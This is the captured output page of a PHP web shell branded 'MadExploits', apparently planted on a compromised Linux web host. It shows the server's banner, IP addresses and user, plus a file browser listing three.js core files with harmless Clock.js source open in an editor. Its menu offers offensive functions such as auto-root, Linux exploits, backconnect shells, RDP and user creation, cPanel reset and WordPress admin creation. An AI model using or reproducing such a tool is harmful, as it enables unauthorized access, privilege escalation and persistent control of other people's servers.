Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.147.61.28
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
HRD-Test /
src /
core /
[ HOME SHELL ]
Name
Size
Permission
Action
BufferAttribute.js
10.24
KB
-rw-r--r--
BufferGeometry.js
20.29
KB
-rw-r--r--
Clock.js
890
B
-rw-r--r--
EventDispatcher.js
1.44
KB
-rw-r--r--
GLBufferAttribute.js
725
B
-rw-r--r--
InstancedBufferAttribute.js
631
B
-rw-r--r--
InstancedBufferGeometry.js
562
B
-rw-r--r--
InstancedInterleavedBuffer.js
747
B
-rw-r--r--
InterleavedBuffer.js
2.33
KB
-rw-r--r--
InterleavedBufferAttribute.js
5.72
KB
-rw-r--r--
Layers.js
577
B
-rw-r--r--
Object3D.js
17.36
KB
-rw-r--r--
Raycaster.js
2.18
KB
-rw-r--r--
RenderTarget.js
3.31
KB
-rw-r--r--
Uniform.js
199
B
-rw-r--r--
UniformsGroup.js
1.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Clock.js
class Clock { constructor( autoStart = true ) { this.autoStart = autoStart; this.startTime = 0; this.oldTime = 0; this.elapsedTime = 0; this.running = false; } start() { this.startTime = now(); this.oldTime = this.startTime; this.elapsedTime = 0; this.running = true; } stop() { this.getElapsedTime(); this.running = false; this.autoStart = false; } getElapsedTime() { this.getDelta(); return this.elapsedTime; } getDelta() { let diff = 0; if ( this.autoStart && ! this.running ) { this.start(); return 0; } if ( this.running ) { const newTime = now(); diff = ( newTime - this.oldTime ) / 1000; this.oldTime = newTime; this.elapsedTime += diff; } return diff; } } function now() { return ( typeof performance === 'undefined' ? Date : performance ).now(); // see #10732 } export { Clock };
Close